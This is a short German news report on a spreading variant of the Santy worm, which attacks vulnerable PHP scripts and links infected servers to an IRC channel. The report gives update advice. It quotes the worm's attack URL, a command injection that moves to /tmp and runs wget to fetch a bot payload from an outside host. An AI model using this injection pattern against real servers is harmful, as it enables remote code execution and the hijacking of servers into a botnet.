Die neue Variante des Wurms Santy – die statt über Google auch über Yahoo nach PHP-Scripten zum Angreifen sucht (wir berichteten) – scheint gefährlicher als bisher angenommen. Laut einem Bericht von Heise Security werden immer mehr infizierte Seiten gemeldet. Offenbar sucht der Wurm systematisch nacht Schwachstellen in PHP-Scripten und schreibt dann den URL-Code in der folgenden Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Wenn das Script den Inhalt seiner Variablen nicht ordentlich prüft, werden unter Umständen die Befehle ausgeführt. Der Wurm verbindet sich unter anderem mit einem IRC-Channel. Laut den Kollegen von Heise Security sind bisher über 700 infizierte Server bem IRC-Channel registiert und es werden stündlich mehr. Dies zeigt, dass der Wurm erschreckend oft Erfolg hat. Die Administratoren von visualcoders.net wurden von Heise Security informiert, haben sich aber bisher nicht gemeldet.
Leider gibt es für diese Art von Angriffen bisher wenig Schutzmöglichkeiten. Für installierte Open-Source Anwendungen, die auf PHP basieren ist es ratsam, auf die neueste Variante zu updaten. So soll die neueste Version 2.0.11 der weit verbreiteten Forensoftware phpBB bisher nicht verwundbar sein.
